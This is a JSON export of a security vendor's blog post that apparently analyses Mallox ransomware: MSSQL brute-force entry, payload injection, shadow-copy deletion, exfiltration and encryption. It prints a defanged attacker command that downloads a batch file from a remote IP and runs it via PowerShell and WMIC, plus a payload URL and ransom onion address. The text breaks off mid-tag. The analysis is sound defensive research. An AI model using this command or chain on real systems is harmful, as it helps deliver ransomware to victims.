{"id":91936,"date":"2023-08-18T15:57:55","date_gmt":"2023-08-18T10:27:55","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=91936"},"modified":"2023-08-18T16:43:06","modified_gmt":"2023-08-18T11:13:06","slug":"mallox-ransomware-strikes-unsecured-mssql-servers","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/mallox-ransomware-strikes-unsecured-mssql-servers\/","title":{"rendered":"Mallox Ransomware Strikes Unsecured MSSQL Servers"},"content":{"rendered":"<h3><strong>Introduction:<\/strong><\/h3>\n<p>First observed in the middle of 2021, &#8216;Mallox&#8217; Ransomware has emerged as a formidable threat in the cyber crime landscape. With its ability to encrypt all volumes, including local and network shared drives, it gradually spreads its control over the system, leaving victims in a state of digital despair.<\/p>\n<p>Mallox Ransomware uses the \u201c.mallox\u201d extension on the encrypted files as it drops its \u2018ransom note\u2019 with the name &#8211; \u201cFile Recovery.txt\u201d which contains the unique \u201ctor\u201d link for\u00a0 further communication between the attacker and the unsuspecting users.<\/p>\n<p>In this blog, we will take you deep into our research of the Mallox Ransomware, to help you understand how stealthily it works, as well as update you on how to stay protected from it.<\/p>\n<h3><strong>Attack Vector:<\/strong><\/h3>\n<p>Our investigation indicates that Mallox (aka TargetCompany) Ransomware is currently targeting unsecured Microsoft SQL Servers as an attack vector to infiltrate victims&#8217; systems and distribute the ransomware.<\/p>\n<p>Furthermore, we have noticed multiple instances of failed and erroneous attempts on publicly exposed MSSQL servers to gain initial access to the victims&#8217; network. This pattern is indicative of MSSQL brute force attacks, and also highlights the pivotal role these servers play as the primary point of entry into the victim\u2019s system.<\/p>\n<p>It is observed that, as it gains initial access to the unsecured MSSQL instance via brute force attacks, it uses MSSQL service \u2018sqlservr.exe\u2019 command line to infiltrate the malicious files and payload onto the victim&#8217;s machine.<\/p>\n<p><em>&#8220;C:\\WINDOWS\\\\System32\\\\cmd.exe&#8221; \/C echo $cl = New-Object System.Net.WebClient &gt;%TEMP%\\updt.ps1 &amp; echo $cl.DownloadFile(&#8220;http[:]\/\/43[.]138[.]76[.]102\/Mfhigwwvsie[.]bat&#8221;, &#8220;%TEMP%\\tzt.bat&#8221;) &gt;&gt; %TEMP%\\updt.ps1 &amp; powershell -ExecutionPolicy Bypass %TEMP%\\updt.ps1 &amp; WMIC process call create &#8220;%TEMP%\\tzt.bat&#8221;<\/em><\/p>\n<h3><strong>Infection Chain:<\/strong><\/h3>\n<p>During the execution of tzt.bat it injects the ransom code in the Aspnet_Complier.exe and then it drops and executes the killer.bat file which deletes all the unwanted services and kills all the tasks so that the encryption process is successful.<\/p>\n<figure id=\"attachment_91937\" aria-describedby=\"caption-attachment-91937\" style=\"width: 569px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91937 size-full\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/1_Infection-chain.png\" alt=\"\" width=\"569\" height=\"253\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/1_Infection-chain.png 569w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/1_Infection-chain-300x133.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/1_Infection-chain-150x67.png 150w\" sizes=\"(max-width: 569px) 100vw, 569px\" \/><figcaption id=\"caption-attachment-91937\" class=\"wp-caption-text\"><em>Fig1: Infection Chain\u00a0<\/em><\/figcaption><\/figure>\n<h3><strong>Technical Analysis of Payload:<\/strong><\/h3>\n<p>Bat file executes the .NET payload \u201cMfhigwwvise.exe\u201d; which is responsible for the injection of ransomware code.<\/p>\n<p>During the analysis of .NET payload, it was discovered that it downloads another encrypted VDF payload from the \u201chxxps:\/\/files.catbox.moe\/r6piiq.vdf, which is encrypted with AES Cipher &#8211; As shown in the figure below.<\/p>\n<p>This further decrypts directly into the memory.<\/p>\n<figure id=\"attachment_91957\" aria-describedby=\"caption-attachment-91957\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91957 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/2_Downloading-VDF-from-C2-650x348.jpg\" alt=\"\" width=\"650\" height=\"348\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/2_Downloading-VDF-from-C2-650x348.jpg 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/2_Downloading-VDF-from-C2-300x161.jpg 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/2_Downloading-VDF-from-C2-768x412.jpg 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/2_Downloading-VDF-from-C2-789x423.jpg 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/2_Downloading-VDF-from-C2-150x80.jpg 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/2_Downloading-VDF-from-C2.jpg 892w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91957\" class=\"wp-caption-text\"><em>Fig2: Downloading VDF from C2<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_91955\" aria-describedby=\"caption-attachment-91955\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91955 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/3_Decrypted-VDF-paylaod-650x287.jpg\" alt=\"\" width=\"650\" height=\"287\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/3_Decrypted-VDF-paylaod-650x287.jpg 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/3_Decrypted-VDF-paylaod-300x132.jpg 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/3_Decrypted-VDF-paylaod-768x339.jpg 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/3_Decrypted-VDF-paylaod-789x348.jpg 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/3_Decrypted-VDF-paylaod-150x66.jpg 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/3_Decrypted-VDF-paylaod.jpg 888w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91955\" class=\"wp-caption-text\"><em>Fig3: Decrypted VDF Payload<\/em><\/figcaption><\/figure>\n<p>The Decrypted DLL file is further obfuscated with an IntelliLock obfuscator. The loader now loads the decrypted ransomware DLL into another process using the process hollowing technique.<\/p>\n<p>After creating the thread pool, the loader then uses the InvokeMember() function to inject and execute the ransomware code into Aspnet Compler.exe.<\/p>\n<figure id=\"attachment_91956\" aria-describedby=\"caption-attachment-91956\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91956 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/4_Invokes-the-DLL-function-650x337.jpg\" alt=\"\" width=\"650\" height=\"337\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/4_Invokes-the-DLL-function-650x337.jpg 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/4_Invokes-the-DLL-function-300x156.jpg 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/4_Invokes-the-DLL-function-768x398.jpg 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/4_Invokes-the-DLL-function-789x409.jpg 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/4_Invokes-the-DLL-function-150x78.jpg 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/4_Invokes-the-DLL-function.jpg 870w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91956\" class=\"wp-caption-text\"><em>Fig4: Invokes the DLL Function<\/em><\/figcaption><\/figure>\n<h3><strong>Technical Analysis of Injected Ransom Code:<\/strong><\/h3>\n<p>The injected payload pf the Mallox Ransomware is the main module that contains the country check, Deletion on of the shadow copy, Termination of running processes, and encryption.<\/p>\n<p>Firstly, It checks the default language ID for the current user to exclude some countries from the targeted attack.<\/p>\n<figure id=\"attachment_91954\" aria-describedby=\"caption-attachment-91954\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91954 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/5_Checks-for-LangID-650x59.png\" alt=\"\" width=\"650\" height=\"59\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/5_Checks-for-LangID-650x59.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/5_Checks-for-LangID-300x27.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/5_Checks-for-LangID-768x70.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/5_Checks-for-LangID-789x71.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/5_Checks-for-LangID-150x14.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/5_Checks-for-LangID.png 850w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91954\" class=\"wp-caption-text\"><em>Fig5: Checks for LangID<\/em><\/figcaption><\/figure>\n<p>It then creates the threads. The first thread will delete Registry keys and then it deletes the Shadow copy as shown in below:<\/p>\n<figure id=\"attachment_91953\" aria-describedby=\"caption-attachment-91953\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91953 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/6_Deletion-of-Registry-keys-650x316.png\" alt=\"\" width=\"650\" height=\"316\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/6_Deletion-of-Registry-keys-650x316.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/6_Deletion-of-Registry-keys-300x146.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/6_Deletion-of-Registry-keys-768x374.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/6_Deletion-of-Registry-keys-789x384.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/6_Deletion-of-Registry-keys-150x73.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/6_Deletion-of-Registry-keys.png 871w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91953\" class=\"wp-caption-text\"><em>Fig6: Deletion of Registration Keys<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_91952\" aria-describedby=\"caption-attachment-91952\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91952 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/7_Deletion-of-shadow-copy-650x106.png\" alt=\"\" width=\"650\" height=\"106\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/7_Deletion-of-shadow-copy-650x106.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/7_Deletion-of-shadow-copy-300x49.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/7_Deletion-of-shadow-copy-768x126.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/7_Deletion-of-shadow-copy-789x129.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/7_Deletion-of-shadow-copy-150x25.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/7_Deletion-of-shadow-copy.png 1020w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91952\" class=\"wp-caption-text\"><em>Fig7: Deletion of Shadow Copy<\/em><\/figcaption><\/figure>\n<p>The second thread will modify the Boot Configuration, and terminates some of the hardcoded processes.<\/p>\n<figure id=\"attachment_91951\" aria-describedby=\"caption-attachment-91951\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91951 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/8_Use-of-BCD-cmd-for-boot-configuration-650x24.png\" alt=\"\" width=\"650\" height=\"24\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/8_Use-of-BCD-cmd-for-boot-configuration-650x24.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/8_Use-of-BCD-cmd-for-boot-configuration-300x11.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/8_Use-of-BCD-cmd-for-boot-configuration-768x28.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/8_Use-of-BCD-cmd-for-boot-configuration-789x29.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/8_Use-of-BCD-cmd-for-boot-configuration-150x6.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/8_Use-of-BCD-cmd-for-boot-configuration.png 890w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91951\" class=\"wp-caption-text\">Fig8: Use of BCD cmd for Boot Configuration<\/figcaption><\/figure>\n<figure id=\"attachment_91950\" aria-describedby=\"caption-attachment-91950\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91950 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/9_Termination-of-process-650x213.png\" alt=\"\" width=\"650\" height=\"213\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/9_Termination-of-process-650x213.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/9_Termination-of-process-300x98.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/9_Termination-of-process-768x251.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/9_Termination-of-process-150x49.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/9_Termination-of-process.png 789w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91950\" class=\"wp-caption-text\"><em>Fig9: Termination of Process<\/em><\/figcaption><\/figure>\n<p>After this, the third thread will remove SQL-Related Services\u2019 used command line. As shown in the figure below:<\/p>\n<figure id=\"attachment_91949\" aria-describedby=\"caption-attachment-91949\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91949 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/10_Remove-SQL-Related-Services-650x284.png\" alt=\"\" width=\"650\" height=\"284\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/10_Remove-SQL-Related-Services-650x284.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/10_Remove-SQL-Related-Services-300x131.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/10_Remove-SQL-Related-Services-768x335.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/10_Remove-SQL-Related-Services-789x344.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/10_Remove-SQL-Related-Services-150x65.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/10_Remove-SQL-Related-Services.png 969w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91949\" class=\"wp-caption-text\"><em>Fig10: Remove SQL-Related Services<\/em><\/figcaption><\/figure>\n<p>Upon attempting to shut down or reboot the PC, \u00a0it displays a warning message to the user stating: &#8216;<em>Do NOT shutdown OR reboot your PC: this might damage your files permanently!&#8217;<\/em><\/p>\n<p>It modifies the Windows registry to prevent users from shutting down or restarting the system. By configuring specific registry values, it disables the Shutdown, Restart, and Sign-out options, effectively blocking users from performing these actions.<\/p>\n<figure id=\"attachment_91948\" aria-describedby=\"caption-attachment-91948\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91948 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/11_Disables-the-system-options-650x267.png\" alt=\"\" width=\"650\" height=\"267\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/11_Disables-the-system-options-650x267.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/11_Disables-the-system-options-300x123.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/11_Disables-the-system-options-768x316.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/11_Disables-the-system-options-789x324.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/11_Disables-the-system-options-150x62.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/11_Disables-the-system-options.png 822w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91948\" class=\"wp-caption-text\"><em>Fig11: Disables the System Options<\/em><\/figcaption><\/figure>\n<p><strong>Exfiltration System Information<\/strong><\/p>\n<p>Mallox Ransomware can exfiltrate the data from a targeted system prior to its encryption. Similar to the prevailing approach of numerous other contemporary ransomware groups, it operates a website for the purpose of exposing data owned by victims who decline to meet their ransom demands. It collects system information and transfers it to the C2C.<\/p>\n<figure id=\"attachment_91947\" aria-describedby=\"caption-attachment-91947\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91947 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/12_Exfiltration-of-data-targeted-system-650x298.png\" alt=\"\" width=\"650\" height=\"298\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/12_Exfiltration-of-data-targeted-system-650x298.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/12_Exfiltration-of-data-targeted-system-300x138.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/12_Exfiltration-of-data-targeted-system-768x352.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/12_Exfiltration-of-data-targeted-system-789x362.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/12_Exfiltration-of-data-targeted-system-150x69.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/12_Exfiltration-of-data-targeted-system.png 804w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91947\" class=\"wp-caption-text\"><em>Fig12: Exfiltration of Data Targeted System<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_91946\" aria-describedby=\"caption-attachment-91946\" style=\"width: 615px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91946 size-full\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/13_Connection-to-C2-server.png\" alt=\"\" width=\"615\" height=\"86\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/13_Connection-to-C2-server.png 615w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/13_Connection-to-C2-server-300x42.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/13_Connection-to-C2-server-150x21.png 150w\" sizes=\"(max-width: 615px) 100vw, 615px\" \/><figcaption id=\"caption-attachment-91946\" class=\"wp-caption-text\"><em>Fig13: Connection to C2 Server<\/em><\/figcaption><\/figure>\n<p><strong>Encryption:<\/strong><\/p>\n<p>Encryption threads are created based on the number of existing processors, with a maximum limit of 64 threads.<\/p>\n<figure id=\"attachment_91945\" aria-describedby=\"caption-attachment-91945\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91945 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/14_Encryption-threads-w.r.t-No.-Of-processor-650x213.png\" alt=\"\" width=\"650\" height=\"213\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/14_Encryption-threads-w.r.t-No.-Of-processor-650x213.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/14_Encryption-threads-w.r.t-No.-Of-processor-300x98.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/14_Encryption-threads-w.r.t-No.-Of-processor-150x49.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/14_Encryption-threads-w.r.t-No.-Of-processor.png 737w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91945\" class=\"wp-caption-text\"><em>Fig14: Encryption Threads w.r.t No. Of Processor<\/em><\/figcaption><\/figure>\n<p><strong>Folders and Files Exclusion:<\/strong><\/p>\n<p><span class=\"ui-provider fz b c d e f g h i j k l m n o p q r s t u v w x y z ab ac ae af ag ah ai aj ak\" dir=\"ltr\">It traverses all the folders and uses API <u>\u201c<\/u>FindFirstFileExW<u>\u201d<\/u>. to exclude the whitelisted folders. This helps the system work properly after encryption. Accordingly, it excludes the whitelisted files and extensions from the encryption process. It also excludes the ransom note \u201cFile Recovery.txt\u201d from the encryption process.\u202f\u00a0<\/span><\/p>\n<figure id=\"attachment_91944\" aria-describedby=\"caption-attachment-91944\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91944 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/15_Comparing-with-whitelisted-folders-650x193.png\" alt=\"\" width=\"650\" height=\"193\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/15_Comparing-with-whitelisted-folders-650x193.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/15_Comparing-with-whitelisted-folders-300x89.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/15_Comparing-with-whitelisted-folders-768x228.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/15_Comparing-with-whitelisted-folders-789x234.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/15_Comparing-with-whitelisted-folders-150x44.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/15_Comparing-with-whitelisted-folders.png 833w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91944\" class=\"wp-caption-text\"><em>Fig15: Comparing with Whitelisted Folders<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_91943\" aria-describedby=\"caption-attachment-91943\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91943 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/16_Comparing-with-whitelisted-ext.-650x315.png\" alt=\"\" width=\"650\" height=\"315\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/16_Comparing-with-whitelisted-ext.-650x315.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/16_Comparing-with-whitelisted-ext.-300x145.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/16_Comparing-with-whitelisted-ext.-768x372.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/16_Comparing-with-whitelisted-ext.-789x382.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/16_Comparing-with-whitelisted-ext.-150x73.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/16_Comparing-with-whitelisted-ext..png 1016w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91943\" class=\"wp-caption-text\"><em>Fig16: Comparing with Whitelisted Extensions<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_91942\" aria-describedby=\"caption-attachment-91942\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91942 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/17_Comparing-with-whitelisted-files-650x274.png\" alt=\"\" width=\"650\" height=\"274\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/17_Comparing-with-whitelisted-files-650x274.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/17_Comparing-with-whitelisted-files-300x126.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/17_Comparing-with-whitelisted-files-768x324.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/17_Comparing-with-whitelisted-files-789x333.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/17_Comparing-with-whitelisted-files-150x63.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/17_Comparing-with-whitelisted-files.png 906w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91942\" class=\"wp-caption-text\"><em>Fig17: Comparing with Whitelisted Files<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_91941\" aria-describedby=\"caption-attachment-91941\" style=\"width: 587px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91941 size-full\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/18_Comparing-with-whitelisted-files.png\" alt=\"\" width=\"587\" height=\"281\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/18_Comparing-with-whitelisted-files.png 587w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/18_Comparing-with-whitelisted-files-300x144.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/18_Comparing-with-whitelisted-files-150x72.png 150w\" sizes=\"(max-width: 587px) 100vw, 587px\" \/><figcaption id=\"caption-attachment-91941\" class=\"wp-caption-text\"><em>Fig18: Comparing with Whitelisted Files<\/em><\/figcaption><\/figure>\n<p>The Ransomware note, labelled &#8220;<strong>File Recovery.txt<\/strong>&#8220;, is created in all the folders. This note provides an Onion link for communication with the attackers for decryption, as shown below:<\/p>\n<p><strong>Run TOR browser and open the site:<\/strong><\/p>\n<p><strong><em>Wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion[\/]mallox[\/]privateSignin <\/em><\/strong><\/p>\n<figure id=\"attachment_91940\" aria-describedby=\"caption-attachment-91940\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91940 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/19_Creating-ransom-notes-650x357.png\" alt=\"\" width=\"650\" height=\"357\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/19_Creating-ransom-notes-650x357.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/19_Creating-ransom-notes-300x165.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/19_Creating-ransom-notes-768x422.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/19_Creating-ransom-notes-789x434.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/19_Creating-ransom-notes-150x82.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/19_Creating-ransom-notes.png 926w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91940\" class=\"wp-caption-text\"><em>Fig 19: Creating Ransom Notes<\/em><\/figcaption><\/figure>\n<p>It uses sala20 Encryption algorithm to encrypt the samples<\/p>\n<figure id=\"attachment_91939\" aria-describedby=\"caption-attachment-91939\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91939 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/20_Encryption-function-650x88.png\" alt=\"\" width=\"650\" height=\"88\" 